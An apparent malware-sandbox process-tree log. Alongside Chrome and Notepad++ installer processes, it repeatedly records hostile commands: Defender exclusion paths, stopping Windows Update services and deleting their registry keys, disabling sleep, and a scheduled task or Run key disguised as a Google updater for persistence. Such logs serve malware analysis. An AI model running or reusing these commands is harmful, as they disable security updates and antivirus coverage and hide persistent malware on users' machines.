    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5388 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:4324
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5204 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:4172
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4632 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:3732
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4588 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:5680
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5876 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:3836
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=6092 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:6132
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5220 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:3796
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5960 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:1008
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6532 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:4136
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6568 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:2284
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6632 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:408
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6644 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:5576
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6768 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:5792
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:5556
- - C:\Users\Admin\Downloads\npp.8.5.Installer.x64.exe
    "C:\Users\Admin\Downloads\npp.8.5.Installer.x64.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    PID:3684
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Program Files\Notepad++\NppShell_06.dll"
      4⤵
      Loads dropped DLL
      PID:5648
    - - C:\Windows\system32\regsvr32.exe
        
        /s "C:\Program Files\Notepad++\NppShell_06.dll"
        5⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:4452
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe" "C:\Program Files\Notepad++\notepad++.exe"
      4⤵
      PID:4272
  - - C:\Program Files\Notepad++\notepad++.exe
      "C:\Program Files\Notepad++\notepad++.exe" "C:\Program Files\Notepad++\change.log"
      4⤵
      Executes dropped EXE
      PID:4332
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=1752 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:2396
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=4908 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:548
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5332 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:1088
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6652 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:944
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=6664 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:1760
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=6080 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:1748
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6412 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:2
    3⤵
    PID:4468
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=2944 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:1
    3⤵
    PID:2776
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7040 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:1724
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 --field-trial-handle=1748,i,6924614332414434691,1327031544325829110,131072 /prefetch:8
    3⤵
    PID:3924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4996
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:3832
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4380
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1192
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1760
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3328
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2764
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1900
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:6032
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:4980
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4536
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3756
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5648
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4312
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:3368
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:2408
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:1008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lmrgyyq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nnmnos#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3424
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:3136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2656
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:2328
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4960
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1896
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5768
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4084
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3612
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:3164
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1548
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:3420
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:224
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:2632
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5916
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:3764
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:5044
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:2268
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lmrgyyq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nnmnos#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5288
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:5584
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2284
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:4600
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2544
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5664
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3920
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4644
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3040
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4104
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:5352
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:4520
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:5488
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3800
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5368
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4468
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:6036
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4672
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lmrgyyq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nnmnos#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1784
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:5008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3716
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:6028
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5220
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1608
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2808
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3536
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2648
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:2880
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:3936
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:2160
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4380
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lmrgyyq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2204
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe hpnxongbgxf
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:5860
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:2784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    PID:4504
- C:\Windows\System32\conhost.exe
